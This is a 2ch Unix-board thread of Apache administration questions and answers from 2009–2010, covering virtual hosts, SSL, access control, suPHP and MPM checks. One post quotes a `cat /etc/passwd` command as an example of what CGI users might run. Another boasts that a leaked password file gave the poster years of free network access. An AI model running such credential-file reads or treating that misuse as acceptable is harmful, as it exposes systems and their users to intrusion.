Apache関連 Part11at UNIX
Apache関連 Part11 - 暇つぶし2ch231:225
09/08/19 19:41:51
>>226
やってみたけど
Compiled in modules:
core.c
prefork.c
http_core.c
mod_so.c
って表示されて俺のレベルではハードルが高すぎました。
>>227
探してみましたが今回はそういった親切なフォルダやファイルはなさそうでした。
>>228
ソースのディレクトリは何故かきれいに掃除してありました・・・
>>229
サーバ止められないのでそのあたり少し難しいかもしれません
>>230
入れ直したいんですが止められないのでちょっと難しいです。

anaconda-ks.cfgのログに%packagesに@web-server自体がなかったので
OS構築後に入れたのはわかったんですが、初心者の私にはハードルが高そうですね。

232:名無しさん@お腹いっぱい。
09/08/19 20:10:36
質問するなら動作環境くらい書いとけ

anacondaのログを確認とかヘンなことしてるが普通はrpmで有無を確認するだろ
パッケージで入れてるなら同じパッケージを入れて設定をコピーして修正

野良ビルドならhttpd.confから主要なファイルの配置先を把握して
それらのディレクトリやファイルを別マシンにコピーすればいい

以上が意味不明でお手上げと言うなら素直に出来ませんと伝えた方がいいね

233:名無しさん@お腹いっぱい。
09/08/19 20:29:11
>>231
> サーバ止められないのでそのあたり少し難しいかもしれません

バイナリーまるごとコピーするのに、
なぜサーバーを止める必要があると思い込んでるの?

234:225
09/08/19 20:41:55
>>232
既にrpmは確認してあります。httpd.confについてはファイルの配置先はいま確認してますので
そちらからさかのぼっていけば多分だいたいはわかると思います。

言われていることは初歩的なことなので初心者の私でも理解は出来ております。
的確なアドバイスありがとうございます。

>>231
すいません。HDDまるごとごっそりと勘違いしてると思います。
主要な部分だけなら別に止める必要はないですね。


235:名無しさん@お腹いっぱい。
09/08/19 20:52:03
>>234
元がrpmなら、同じrpmを別マシンに入れればいいだけ。

あえてconfigureのオプションを確認したいなら、
そのrpmに対して rpm -qi で表示されるソースのrpmを入手して、
その中の SPECファイルに configureにオプションを付けたコマンド行が書いてある。

236:名無しさん@お腹いっぱい。
09/08/21 10:44:53
初歩的な質問ですみません。
Apache2.2を使ってます。
UTF-8で¥(円マーク)が/になってしまうのですが
httpd.confで何を設定したらいいでしょうか?

237:名無しさん@お腹いっぱい。
09/08/21 10:51:55
バックスラッシュじゃなくスラッシュに化けるってのは重症だな。

238:名無しさん@お腹いっぱい。
09/08/21 11:00:49
うむw


239:名無しさん@お腹いっぱい。
09/08/21 11:52:54
重症か軽症かは関係ありませんので詳しい方のみ回答をお願いします

240:名無しさん@お腹いっぱい。
09/08/21 12:06:31
その釣りとっくに秋田>>239

241:名無しさん@お腹いっぱい。
09/08/21 12:45:19
\を使わなければいいんじゃないかな。

242:名無しさん@お腹いっぱい。
09/08/21 12:52:35
¥を使えばいいんじゃないかな。

243:名無しさん@お腹いっぱい。
09/08/21 19:15:24
>>236
マジレスすっと、それApacheとかhttpd.confとか無関係、板違いの話題。
SJISであれUTF-8であれ、\x5Cのバイナリ的には同じ。
ただブラウザで選択される言語のフォントで文字の割り当てが違うだけ。

>>241,242の言うとおりにするか、
詳しくは、Web系の板行くなり、HTML/CSS関係、実体参照あたりでググってくれ。

244:名無しさん@お腹いっぱい。
09/08/21 19:20:44
ダウト。
UTF-8なら、¥と\(ともに半角)のコードは違う。

245:名無しさん@お腹いっぱい。
09/08/21 19:42:07
U+00a5もSJISとかだと0x5cにマッピングされるのが困る

246:名無しさん@お腹いっぱい。
09/08/21 22:53:52
ダウトって2chで言う奴を8年ぶりくらいに見た

247:名無しさん@お腹いっぱい。
09/08/21 23:29:17
この板ではたまに見かけるし>>239みたいな一つ覚えも多いよな

248:名無しさん@お腹いっぱい。
09/08/22 00:51:17
8年も前に見えないな
スレリンク(unix板:814番)

249:名無しさん@お腹いっぱい。
09/08/22 15:55:56
>>246
ダウト
5年ぶりくらいに見た

250:名無しさん@お腹いっぱい。
09/08/22 15:59:41
>>249
ダウト

だから、1ヵ月ぶりだって(>>248)

251:名無しさん@お腹いっぱい。
09/08/22 16:15:25
この板ならではの終わっちゃってる年寄り感がすごいっす

252:名無しさん@お腹いっぱい。
09/08/22 17:57:37
>>250
ダウト
同じ人

253:名無しさん@お腹いっぱい。
09/08/22 18:45:38
ダウトって結構いろんなところで見かけるけど言ってる人は同じ人じゃないかとは思ってた。

254:名無しさん@お腹いっぱい。
09/08/22 18:58:55
「ダウト」に「ダウト」で反論してたりするのもよく見かけるし、
同じ人と考えるのは無理があり過ぎるなぁ

255:名無しさん@お腹いっぱい。
09/08/23 15:25:06
ジジイ臭い言い回し、fj(笑)で流行ってたんだろ。

256:名無しさん@お腹いっぱい。
09/08/23 20:52:35
そういうことにしたいのですね。

257:名無しさん@お腹いっぱい。
09/08/25 11:23:48
普通の会話でダウトとか言う奴はジジイだろw
死語に近いしww

258:名無しさん@お腹いっぱい。
09/08/27 01:56:52
じじい同士の会話で意味が通じれば使ってもいーんでね?

259:名無しさん@お腹いっぱい。
09/08/27 12:52:43
「~してみるテスト」は復活してきている気がする

260:名無しさん@お腹いっぱい。
09/08/27 13:33:05
今なら「~なう」だろ。

261:名無しさん@お腹いっぱい。
09/08/27 20:01:34
httpd.apache.org のサイト、壊れてる。。。

262:名無しさん@お腹いっぱい。
09/08/27 20:03:13
おぉ、本当だ。

263:名無しさん@お腹いっぱい。
09/08/27 20:54:45
戻ったね

264:名無しさん@お腹いっぱい。
09/08/27 21:07:46
あ、ほんとだ、戻ったね。

265:名無しさん@お腹いっぱい。
09/08/29 02:59:26
これからの復旧中を目撃したのか。
URLリンク(www.f-secure.com)

266:261
09/08/29 06:59:11
>>265 それっぽい。もっとも、俺が見たのはそのメッセージじゃなく、
トップページのディレクトリがまんまで晒されていたとこ。

267:名無しさん@お腹いっぱい。
09/08/29 07:39:59
うん、俺が見たのもそれ。復旧作業中にindex.htmlが無かった瞬間を目撃したのだろう。

268:名無しさん@お腹いっぱい。
09/08/29 07:45:48
うちは弱小サイトだから、鯖のコンテンツを直すときには
dev 機で作業してチェックしてから production 機に移すとか
やらんで、prod 機の html をいきなりemacs で編集、なんて
結構やるが、apache site もまさかその類なんじゃろか。

269:名無しさん@お腹いっぱい。
09/08/29 07:48:30
URLリンク(svn.apache.org)
*) ServerTokens now accepts 'Off' which disables sending of
Server: header and sets SERVER_SOFTWARE to empty. It also accepts
'Set' which allows the user to specify any string as the Server:
name. [Jim Jagielski]


270:名無しさん@お腹いっぱい。
09/08/29 07:49:44
>>268
あるサーバー上のデータをrsyncかなんかで定期的に同期してる

271:名無しさん@お腹いっぱい。
09/08/29 08:08:16
>>269
キタコレ

これでわざわざいじる必要なくなるか

272:名無しさん@お腹いっぱい。
09/08/29 09:47:01
つことは、これ、mod_security つかって、SecResponseBodyAccess や
SecServerSignature をセットしないでも良くなった、てことかい?

273:名無しさん@お腹いっぱい。
09/09/04 02:15:15
今日PerlとPHPをユーザ権限で走らせたくてmod_suphp入れたんだけど
いろんなブログのsuPHPのインストール記録みると、たいていの人がsuExecも一緒に入れてるんだけど、ありゃなんでだ??
AddHandler x-suphp-cgi .cgi .pl
suPHP_AddHandler x-suphp-cgi
すればsuPHPだけでPHPもPerlもユーザ権限で走るのに、わざわざsuExec入れる意味がわからないんだけど
それともぼくの認識がおかしい?

274:名無しさん@お腹いっぱい。
09/09/04 08:05:30
>>273
マニュアルも読まないし、自分で考えもしない人が世の中にはいっぱいいるから
間違ったやり方が正しいやり方を駆逐する

他の例:URLリンク(ya.maya.st)

275:名無しさん@お腹いっぱい。
09/10/10 09:05:08
所有者 httpd グループ httpd
所有者 apache グループ apache

って、どう違うの?

ブラウザから見るグループウェア使ってるんだけど
アップデートが出ていたのでアップデートを適用して確認のため
ログオンしようとしたらグループウェアをインストールしてるフォルダに権限がないから
入れないよっていう警告が出て入れなかった

仕方ないのでインストールフォルダの権限とかみてたら他はほとんど
所有者 httpd グループ httpdばかりなのにエラーが出てたフォルダは所有者 apache グループ apacheってのに
なってたから試しに所有者 httpd グループ httpdにかえたら入れるようになった

んでもはいれた後も、ブラウザからログオンして使ってると所有権云々のエラーみたいなのが多発する
所有者 httpd グループ httpdでないと駄目なフォルダに所有者 apache グループ apacheとかなっちゃってるのは
何でなんだろう?

Apacheの設定?

276:名無しさん@お腹いっぱい。
09/10/10 12:19:47
>>275
apacheをどのようなユーザ/グループで動かすかは、あくまで利用者が決める範疇。
ただ、バイナリパッケージを配布しているようなディストリビューションでは、
ディストリビューションのレベルでユーザ/グループを決めている。
ただし、それはどの環境でも同じとは限らない。

そのグループウェア、設定項目に、どのユーザ/グループで動かすかの指定があるんじゃないか?
デフォルトがapache/apacheになってるだけで。

277:名無しさん@お腹いっぱい。
09/10/10 18:45:45
初カキコです。スレチでしたら誘導をお願いします。
Windows環境で、USBフラッシュメモリにApache, Perl, PHP, MySQL(SQLight)の入ったPortable Server環境の構築を考えてます。
Portable Server環境で利用するスクリプト(ソフト)はNamazuとMediwWikiを考えています。
調べたところUSBメモリが使えるPortable ServerとしてはXAMPP, EasyPHP, Server2Goなど色々ありますが一長一短のような気がします。
お勧めのPortable Serverがあったら教えてください。

278:名無しさん@お腹いっぱい。
09/10/10 18:59:11
Windows環境で

279:名無しさん@お腹いっぱい。
09/10/10 19:04:58
>>277
きえてくだしあ

280:名無しさん@お腹いっぱい。
09/10/10 19:18:15
あ、ごめん。Unix板だったのか。いつもお世話になってます。
スレタイに誘導されて思わず書きこんじまったよ。


281:名無しさん@お腹いっぱい。
09/10/11 01:46:09
mp4 をストリーミングするモジュールってありませんか?

282:名無しさん@お腹いっぱい。
09/10/11 09:37:46
mod_musicindex

283:名無しさん@お腹いっぱい。
09/10/11 09:58:31
>>282
それ、なんかうまくいかないんですよね。
もうちょっとがんばってみます。

284:名無しさん@お腹いっぱい。
09/10/11 15:23:43
サーバは1台、IPも1つの環境で、sslをサブドメインとドメインで使おうとしています。このサーバではexample.comとexample.netのドメインが割り振られており、それぞれ別のcgiが動いていて、バーチャルホストでアクセスを振り分けています。
example.comではcgiを、svn.example.comではsubversionサーバを動かそうとしています。
IPが1つなので、ワイルドカードsslを使おうとしました。

ssl.confの<VirtualHost _default_:443>以下をコメントアウトし、vhost_ssl.confとかを作ってこう書きました。

# svn用
NameVirtualHost *:443
LoadModule dav_svn_module   modules/mod_dav_svn.so
LoadModule authz_svn_module  modules/mod_authz_svn.so
<VirtualHost *:443>
  ServerAdmin hoge@example.com
  ServerName svn.example.com
  SSLEngine on
  SSLCipherSuite ALL:!ADH:!EXPORT:!SSLv2:RC4+RSA:+HIGH:+MEDIUM:+LOW
  SSLCertificateFile  /path/to/ssl.crt
  SSLCertificateKeyFile /path/to/ssl.key
  <Files ~ "\.(cgi|shtml|phtml|php3?)$">
    SSLOptions +StdEnvVars
  </Files>
  <Location />
    DAV svn
    SSLRequireSSL
    SVNParentPath /path/to/svn_repo
    SVNListParentPath on
    SVNAutoversioning on
    AuthType Digest
    AuthName "example"
    AuthUserFile /path/to/digest_file
    Require valid-user
  </Location>
</VirtualHost>

285:284の続き
09/10/11 15:25:12
# cgi用
Alias /my_cgi/ "/path/to/cgi/"
<VirtualHost *:443>
  ServerName example.com
  <Directory /path/to/cgi/>
    DirectoryIndex example.pl
    Options ExecCGI

    AuthType Digest
    AuthName "example"
    AuthDigestDomain /example/
    AuthUserFile /path/to/digest_file
    Require valid-user
  </Directory>
</VirtualHost>

これで URLリンク(svn.example.com) でsubversionサーバが、 URLリンク(example.com) でcgiが動くのですが、
cgiはhttpでもアクセス出来てしまい、URLリンク(svn.example.com) にアクセスすると、example.netの方のコンテンツが表示されてしまいます。
何処を直せばいいかアドバイスをお願いします。

286:名無しさん@お腹いっぱい。
09/10/11 15:35:06
細かい要件と既存の設定よくわからんが
80番のバーチャルホストも設定しなきゃダメ

NameVirtualHost *:443
NameVirtualHost *:80

<VirtualHost *:443>
ServerName svn.example.com
</VirtualHost>

<VirtualHost *:443>
ServerName example.com
</VirtualHost>

<VirtualHost *:443>
ServerName svn.example.com
</VirtualHost>

<VirtualHost *:80>
ServerName example.com
</VirtualHost>

<VirtualHost *:80>
ServerName example.net
</VirtualHost>

全部説明するのは面倒だから自分で考えてくれ
イメージは
(1)IP・ポートベースバーチャルホストと、名前ベースバーチャルホストは混在可能
(2)NameVirtualHostディレクティブで指定したIP・ポート(今回は*:80、*:443)に名前ベースバーチャルホストを作成する

287:名無しさん@お腹いっぱい。
09/10/11 15:37:34
ああ、これも必要だな

<VirtualHost *:80>
ServerName svn.example.com
</VirtualHost>

288:名無しさん@お腹いっぱい。
09/10/11 15:49:03
>>285 virtualhost のなかに、scriptalias。

289:名無しさん@お腹いっぱい。
09/10/12 10:12:39
日記書くのに高性能なブログツールみたいなのってない??

290: ◆TWARamEjuA
09/10/12 10:29:00 BE:1742382-BRZ(10101)
つ チラシの裏

291:名無しさん@お腹いっぱい。
09/10/12 20:30:48
TiddlyWiki

292:名無しさん@お腹いっぱい。
09/10/13 16:22:04
>>289
URLリンク(ja.wikipedia.org)

293:名無しさん@お腹いっぱい。
09/10/18 22:42:39
mod_vhost_aliasにDOCUMENT_ROOTがVirtualHost非互換っていう不具合があって、バグ報告というか問題提起をしたいんだけど(できれば開発コミュへ直に)、どこにポストしたらいいものでしょうか?

294:名無しさん@お腹いっぱい。
09/10/19 00:40:54
もう出てたな
URLリンク(issues.apache.org)

295:名無しさん@お腹いっぱい。
09/10/19 00:42:10
あ、Bugzillaじゃなくてメーリングリストに投稿したいというなら、
俺は止めないけど、とりあえずBugzillaの議論を見てからでも遅くないと思う

ちなみに俺は英語苦手だから26052の議論を追う気はない

296:名無しさん@お腹いっぱい。
09/10/21 00:02:03
>>295
ありがとうございます。
まさにそのBugzillaに欲しかったエクスキューズがありました。
感謝します。

297:名無しさん@お腹いっぱい。
09/10/27 22:20:03
CentOS 5.4 x86_64 で apache 2.2.14 を野良ビルドしようとしたら、libexpat.so:
could not read symbols だ、といって怒られた。例の、/usr/lib 対 /usr/lib64 の問題だろ、
と思って、かるく ./configure --enable-lib64 とか --with-expat=builtin とか、
LDFLAGS="-L/usr/lib64" とか、そういうので回避できるかと思ったら、どれもダメで、
予想以上に手こずった。

結局、build/config_vars.mkのなかの EXTRA_LDFLAGSの定義を
EXTRA_LDFLAGS = -L/usr/lib64 -L/usr/kerberos/lib と手で
直してとりあえず解決したが。

現象自体は既出だけど、よくある解決法が効かなかったところが不審。
RHEL/CentOS 5.4 の 64bit機で似たような目に遭った香具師いませんか?

298:名無しさん@お腹いっぱい。
09/10/28 02:38:52
>>297
CentOS 5.4 (x86_64) で、普通に build 出来てる。
gcc4.4でもicc11.1でもできてる。

299:名無しさん@お腹いっぱい。
09/11/02 02:29:05

[ aaa.comのdocroot ]
/aaa.com/public_html

[ bbb.comのdocroot]
/aaa.com/public_html/bbb.com/public_html

こういった環境のバーチャルホストを作成したとき、aaa.comのhtaccessの設定て
サブディレクトリにも継承されますか?




300:名無しさん@お腹いっぱい。
09/11/02 15:50:41
誤ってhttpd.confを削除してしまいました(専用レン鯖)。
現在apacheは起動していますが、
何らかで再起動の必要が生じるまでになんとかせねば…。
非常に焦っています。

現在読み込まれているhttpd.confの内容を把握する方法はありませんか?

301:名無しさん@お腹いっぱい。
09/11/02 21:17:16
mod_infoが有効だったらそれを見て書き写す
有効じゃなかったら…俺には思い浮かばないな

302:名無しさん@お腹いっぱい。
09/11/04 02:20:56
>>301
当事者じゃないが、たしかにそれ使えるな。
Thx!

303:名無しさん@お腹いっぱい。
09/11/04 10:53:50
バックアップ無しのレンサバ?
それなら、諦めて次善策考えた方が良い。

304:名無しさん@お腹いっぱい。
09/11/05 00:57:47
Apache(VirtualHost)とTomcatをmod_jkで連携しています。
Tomcatでエラー発生時に、Tomcat側で設定しているエラーページを
表示したいのですが、Apacheのデフォルトのエラードキュメントが表示されてしまいます。
(「Additionally, a xxx error was encountered
while trying to use an ErrorDocument to handle the request」というやつ)

・ErrorDocumentディレクティブは設定していない
・Tomcatからはエラーページが返っている(mod_jk.logのダンプで確認)
・しかし上の直後に"No body with status=xxx for worker=workerx"と出力されている
 →エラーページがbodyとして返ってきているのに何故???
・Tomcatのエラーページの拡張子を.varにするとちゃんとTomcat側のエラーページが表示できる

何故こうなるのか思い当たる点がある方、いらっしゃいませんでしょうか。



305:名無しさん@お腹いっぱい。
09/11/07 19:22:49
>>300
lsofでinode追ってなかったことにするとか
URLリンク(www.itmedia.co.jp)


306:名無しさん@お腹いっぱい。
09/11/07 23:41:45
Linuxの場合そんなことが出来るのか
俺はFreeBSDだけどprocファイルシステム有効にしよっかな

307:名無しさん@お腹いっぱい。
09/11/08 07:54:22
>>306
FreeBSDのprocでは >>305 のようなことはできません。

308:名無しさん@お腹いっぱい。
09/11/08 11:04:33
inodeがわかれば何とかなるのかな。

309:名無しさん@お腹いっぱい。
09/11/09 03:20:37
Apacheはhttpd.conf開きっぱなしにしないような。

310:名無しさん@お腹いっぱい。
09/11/14 00:27:40
質問です。特定のipからのアクセスは、robots.txt以外全て拒否しようとして以下のように書きましたが、robots.txtを含めてアクセスを遮断してしまいます。
どこが悪いんでしょうか?

<Location />
Order Allow,Deny
Allow from all
Deny from 1.1.1.1
</Location>

<Files robots.txt>
Order Deny,Allow
Allow from all
</Files>


311:名無しさん@お腹いっぱい。
09/11/14 00:32:09
>>310
URLリンク(httpd.apache.org)

312:名無しさん@お腹いっぱい。
09/11/14 00:34:59
IPってゆうな。クズ。

313:名無しさん@お腹いっぱい。
09/11/14 05:26:50
>>312
IPv6からしかアクセスできないようにしたいのかもしれないだろ。

314:名無しさん@お腹いっぱい。
09/11/14 08:46:43
ipって略したらIPv4、ってこともないわけだが。

315:名無しさん@お腹いっぱい。
09/11/14 08:49:22
ip(小文字)っていうのは、iprouteというソフトに入ってるコマンド。
iprouteでのアクセスを遮断したい、という質問だろ。

316:名無しさん@お腹いっぱい。
09/11/14 09:52:05
>>314
もちろん。IPv4だけにしたいのかもしれない。当人に聞いてみろ。

317:名無しさん@お腹いっぱい。
09/11/18 03:23:16
IPv9で使いたいのかもしれん
移植がんばれ

318:名無しさん@お腹いっぱい。
09/11/28 13:07:02
Apache 1.3でSSIを使うために
AddType text/x-server-parsed-html .html
を追加したのですが、すると
URLリンク(www.mysite.com)
でindex.htmlにアクセスしたとき、ファイルを保存のダイアログが出てしまいます。
(IE6.0です)
なにか回避方法はないでしょうか?

319:名無しさん@お腹いっぱい。
09/11/28 13:08:53
>>318
アクセスしてみたけどダイアログ出なかったよ?

320:名無しさん@お腹いっぱい。
09/12/02 06:16:35
現在、httpd.confで、以下のように、アクセス禁止をしています。
<Directory "/home/">
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Directory>

しかしこれだと、JPGなどの画像ファイルにはアクセスされてしまいます。
これを、画像ファイルだけ遮断させて、HTMLは表示させるということはできないでしょうか?

<Files ~ "\.(gif|png|jpg)$
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これを試してみましたが、機能しませんでした。

321:320
09/12/02 06:59:47
<Files ~ "\.(gif|jpe?g|png)$">
Order allow,deny
Allow from all
deny from 116.48.25.***
deny from 202.177.48.***
deny from 122.20.183.***
</Files>
これにしたらいけました
お騒がせしてすいません

322:名無しさん@お腹いっぱい。
09/12/04 17:49:51
wrowe、何やってんの?wrowe。

323:名無しさん@お腹いっぱい。
09/12/07 12:05:33
Apache License 2.0ライセンスのjar(改編なし)を梱包した商用製品をリリースする場合についてですが、
ライセンス翻訳には「要求するのは、ユーザーがそのソフトウェアに Apache License のコードが使われていることを知らせる文言を入れることだけである」
とあり、使用ライブラリ名の明記までは書かれていないので、
複数使用していても、
製品マニュアルに「Apache License 2.0のライブラリを使用しています。」と、載せておけばよいのでしょうか?
翻訳だけではライセンスの満たし方がわかりにくいので、その辺わかりやすく解説しているサイト等もありましたら、
教えていただけないでしょうか?

324:名無しさん@お腹いっぱい。
09/12/14 12:44:44
急な質問で申し訳ないのですが。
わたしのサーバで、/var/www/htmlのWEB公開用ディレクトリにconfが置いてあるみたいなのですが、大丈夫でしょうか。
confにはifcfg-eth0など、ネットワーク関連の設定ファイルが入っています。
このディレクトリにconfをおいた覚えはないのですが、何かのバグですか?
もしくはクラッキングされてしまったのでしょうか。

OSはCentOS5.3です。

325:名無しさん@お腹いっぱい。
09/12/14 13:18:02
何言ってんの。

326:名無しさん@お腹いっぱい。
09/12/14 13:27:46
>>325以外に返す言葉が見つからない

327:名無しさん@お腹いっぱい。
09/12/19 12:20:18
>>324 そのマシンも、あんたも、多分、大丈夫ではない。

328:名無しさん@お腹いっぱい。
09/12/24 21:19:46
>>324
それで思い出した。
もう10年以上も前だけど、むかしベッコアメってプロバイダがあってね
そのホームページスペースに自分がアップロードした覚えのないファイルが突如出現したりしてたんだ
ファイル名はcoreなんだけど、当時はcoreの意味がわからなくて、気味悪いからとりあえずFTPでダウンロードしてHEXDUMPしてみたら
中身が/etc/passwordでひっくり返ったことがあった。
サポートに電話してもよくわかないというから、じゃあ自分の持ち物扱いなんだなということで
まぁ、あまりヘンな自慢はできないしアレだけど、その日から数年間ネットの通信料はタダで生活できました。

329:名無しさん@お腹いっぱい。
09/12/24 23:21:48
10年前と言うことは、不正アクセス禁止法成立前か?

330:名無しさん@お腹いっぱい。
09/12/25 01:03:03
>>329
父性にアクセスしてない気もするが(w


331:名無しさん@お腹いっぱい。
10/01/06 07:15:59
板違いではあるのですが、Windows XP Professional SP2で、
apache2.2を動かしていて、perl v5.10.0でプログラムを書いていますがうまく動きません。

具体的には、
URLリンク(www.stackasterisk.jp)
に書いてある★Dにsleep 10;を書くと、すぐにブラウザが開放されず、
10秒ほど読み込み中の状態になります。

Windowsを使っているのが悪いのでしょうか?
UNIX板の皆さんの意見をお聞かせ下さい。



332:名無しさん@お腹いっぱい。
10/01/06 08:03:30
>>331
板違い。
URLリンク(pc11.2ch.net)

333:名無しさん@お腹いっぱい。
10/01/06 09:01:08
>>332
ご指摘どうもです。そちらの板の
perlスレで聞くことにしました。

334:名無しさん@お腹いっぱい。
10/01/20 22:43:02
前々から聞きたいなと思っていたのですが、アクセスログを見ていると、
時々リファラに複数のURIが併記されたものがあります。例えば今さっき来たヤツですが、
URLリンク(yellowinphotograph.net)
URLリンク(www.stephenblog.com)
URLリンク(210.24.175.20:880)
URLリンク(astinweddingordinators.com)
URLリンク(sumissionword.com) URLリンク(www.mah.on.ca)
URLリンク(www.doctorconsult.com.ar)
URLリンク(bridsmajor.blog128.fc2.com) URLリンク(austincar.co.cc)
URLリンク(travelguide.blog.com)
URLリンク(travelguide.blog.com)
URLリンク(ho.hoorku.com)
URLリンク(job.co.cc)
みたいな具合。これは一体何なんですか?
## 上記のすべての URI は、実際のログから取得した文字列に手を入れてあります。
## また長過ぎる行があると言われて跳ねられるので URI の区切れ目で改行しています。

335:名無しさん@お腹いっぱい。
10/01/20 23:15:18
特定のWikiを狙い撃ちしてる

336:名無しさん@お腹いっぱい。
10/01/21 00:00:28
Webサイト管理者への宣伝なんじゃねーの?

337:名無しさん@お腹いっぱい。
10/01/21 03:34:30
自動でリファラ表示するサイト向けの宣伝、とか。
いずれにせよあんまり気にしてもしょうがないと思う。

338:名無しさん@お腹いっぱい。
10/01/21 06:43:52
うちだと複数のURLがつながってるのは無いけど、どっかのアフィブログのURLがくっついてるのはよくあるな

339:名無しさん@お腹いっぱい。
10/01/21 08:47:11
SEO?


340:名無しさん@お腹いっぱい。
10/01/21 09:43:51
>>339
SEOとは何を略した言葉で何を意味するのかわかっていれば
そんなことは言えないと思うんだ

341:名無しさん@お腹いっぱい。
10/01/21 13:11:38
2ch型の掲示板みたいなの(というか主にlog置場)を作りたいんですが、
cgi-binの下に dat/ と subject.txt を置くと error.log に

attempt to invoke directory as script: C:/xampp/cgi-bin/○○○/

と出てしまいますが、httpd.conf の書き方が間違っているんでしょうか?
それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
教えてください。

342:341
10/01/21 13:24:29
ここ↓みたいな感じにできればいいなと思っているんですが。
URLリンク(navi2ch.sourceforge.net)

343:341
10/01/21 13:28:13
書き忘れました。 httpd.confにはこう書ました。

<Directory c:/xampp/cgi-bin/○○○/>
Options Indexes
Order allow,deny
Allow from all
</Directory>



344:名無しさん@お腹いっぱい。
10/01/21 13:31:15
>>342
これは単にファイルが置いてあるだけだよ。
CGIとか関係ない。

345:名無しさん@お腹いっぱい。
10/01/21 13:33:16
>>341
> それともそもそもcgi-binの下に置いたのが間違いなのでしょうか?
はい。

346:341
10/01/21 13:40:11
>>344
それは分っているのですが、ファイル収集のためにcgiを書ました。
>>345
そうなんんですか!? 2chもてっきりそうなってると思ってたんですが、
よくみると2chのスレのURLにはcgi-binって入ってませんね。。。
monazilla とかで2chがどうなっているか聞いたほうがいいんでしょうか。

347:名無しさん@お腹いっぱい。
10/01/21 13:44:59
>>346
2chでも
URLリンク(pc12.2ch.net)
URLリンク(pc12.2ch.net)
とかはただ置いてあるだけ。
CGIは経由していない。

ファイル収集はまた別の話。区別しろ。

348:341
10/01/21 13:54:28
>>347
なるほど。考えなおします。ありがとうございました。

349:341
10/01/21 16:49:48
御陰さまでJaneとLive2chで読み込めるのを確認できました。
どうもありがとうございました。

350:334
10/01/22 01:42:03
>>335-338 ご意見をありがとうございます。
もしかしたら、と思って自分の blog で弾かれている trackback のリストと apache のログを照合すると、
そのまんまピッタリでした。というわけで、なんかトラックバック・スパム?みたいなもののようです。
実害は無いので無視しておくことにします。

351:名無しさん@お腹いっぱい。
10/01/28 17:37:41
FreeBSD(fsdb使えれば)はinodeわかればln(fdsbのコマンド)できる。
zfsでのサルベージ方法教えろ。

352:名無しさん@お腹いっぱい。
10/01/28 19:50:45
頭お菓子な人が来たー

353:名無しさん@お腹いっぱい。
10/02/02 03:27:25
まさにスイーツ(笑)

354:名無しさん@お腹いっぱい。
10/02/26 18:40:21
すみません。
起動中のApacheのMPMがPreforkかWorkerかのどちらであるか調べるコマンドありますか?
Apache 2.0系です。


355:名無しさん@お腹いっぱい。
10/02/26 20:43:36
>>354
環境がわからないけどこんな感じ
apachectl -V
apache2ctl -V

356:名無しさん@お腹いっぱい。
10/02/27 02:00:21
普通に考えたらそうなんだけど、既に起動中のhttpdが
それと同じバイナリファイルから起動されたものであるの
保証がなかったりするから100%ではないような。

357:名無しさん@お腹いっぱい。
10/02/27 02:31:42
あぁあるかも
最近の鯖はCPUはやくてメモリーもたくさん詰めるから
httpd複数立てたほうが効率的だったりするんだよね
ServerLimitとかMaxClientsの上限低すぎるとおもうなー
動画配信とかで1プロセスあたりコネクトしてる時間が異様に長い子沢山なサーバってどういうMax/Limit設定にしてるんだろ?


358:名無しさん@お腹いっぱい。
10/02/27 13:42:24
>>356
Apache Server Informationとか

359:名無しさん@お腹いっぱい。
10/02/27 14:48:32
リブートできる権限があるならMPMを確認した上でリブートしてしまうのが

360:名無しさん@お腹いっぱい。
10/02/27 14:51:13
.htaccessが使えるならこの辺を組み合わせるとか。
<IfModule mpm_prefork_module>
<IfModule mpm_worker_module>
SetEnvIf

361:名無しさん@お腹いっぱい。
10/02/27 19:00:33
workerかpreforkならpsでスレッド情報まで出すオプション付ければ良いんじゃない?

362:名無しさん@お腹いっぱい。
10/03/01 01:28:32
straceで追いかければ動作の違いから判定できるかな?
あと、TeXとかEmacsみたいに任意のプロセスイメージを実行ファイルに
ダンプしてくれるコマンドがあったから、それでダンプして-Vとか。


363:名無しさん@お腹いっぱい。
10/03/24 19:42:20
BASIC認証で使っていい文字ってどんなの?

364:名無しさん@お腹いっぱい。
10/03/25 04:35:58
>>363
URLリンク(abt-archi.com)
「:」がイリーガルキャラクタ
255文字以下であること
あと、AuthName は文字コードを渡せないから日本語だとブラウザによって文字化けする

365:名無しさん@お腹いっぱい。
10/04/05 09:40:25
/var/log/httpdを見ていて気づいたのですが、
ログファイルのオーナーがrootになっています。
User apache
Group apache
として、デーモンはapacheユーザで走らせているのに関わらずです。
何故このような動作をするのでしょうか?


366:名無しさん@お腹いっぱい。
10/04/05 10:50:12
親プロセスがrootだから。

367:名無しさん@お腹いっぱい。
10/04/09 16:36:25
CGIプログラムを作ってて、今までは家のテストサーバーで動かしてたのですが、
だいぶバグも取れてきたので、VPSを借りて公開してみようかと思っています。

そこで質問なんですが、公開する場合、やはりApacheの設定とかってかなり
セキュリティを意識してやらないといけないでしょうか?
家のテストサーバーはCentOSの入門書に書いてあった通り、とりあえずCGIを
使えるように設定しただけなんですが、この程度の知識でVPSでCGIプログラム
を公開するのは無謀ですか?

またお勧めのサイトや書籍等も教えてください。 よろ

368:名無しさん@お腹いっぱい。
10/04/09 16:41:58
Linuxの話はLinux板で。

369:367
10/04/09 16:48:01
>>368

すみません>>367の質問はApacheの設定についての質問の
つもりなんですが・・・
Linux板にApacheスレが見つからなかったもんで・・・


370:名無しさん@お腹いっぱい。
10/04/09 16:58:13
>>368
「Linuxの話はLinux板で」という返しは年寄りスレで。

371:名無しさん@お腹いっぱい。
10/04/09 16:59:35
>>369
くだ質スレでいいよ。

372:367
10/04/09 17:04:08
>>371

行ってきます

373:名無しさん@お腹いっぱい。
10/04/09 19:57:36
レンタルサーバー 板
URLリンク(pc11.2ch.net)


374:名無しさん@お腹いっぱい。
10/05/09 10:40:41
ファイルには更新日時がつくのですが、ディレクトリにアクセスして、DirectoryIndexにあるデフォルトのhtmlファイルが表示された際に、
更新日時が送られません。
更新日時を送るようにするにはどうしたらよいものでしょうか?

375:名無しさん@お腹いっぱい。
10/06/13 22:55:01
suexecでperlをCGIで動かしてるんですが
`cat /etc/passwd`;とか
system("/usr/bin/foo");
とかユーザがコマンドを実行できないようにするには
どう対処すればいいでしょうか?

376:名無しさん@お腹いっぱい。
10/06/18 04:01:40
パーミッションを700にすればいいんじゃないの

377:名無しさん@お腹いっぱい。
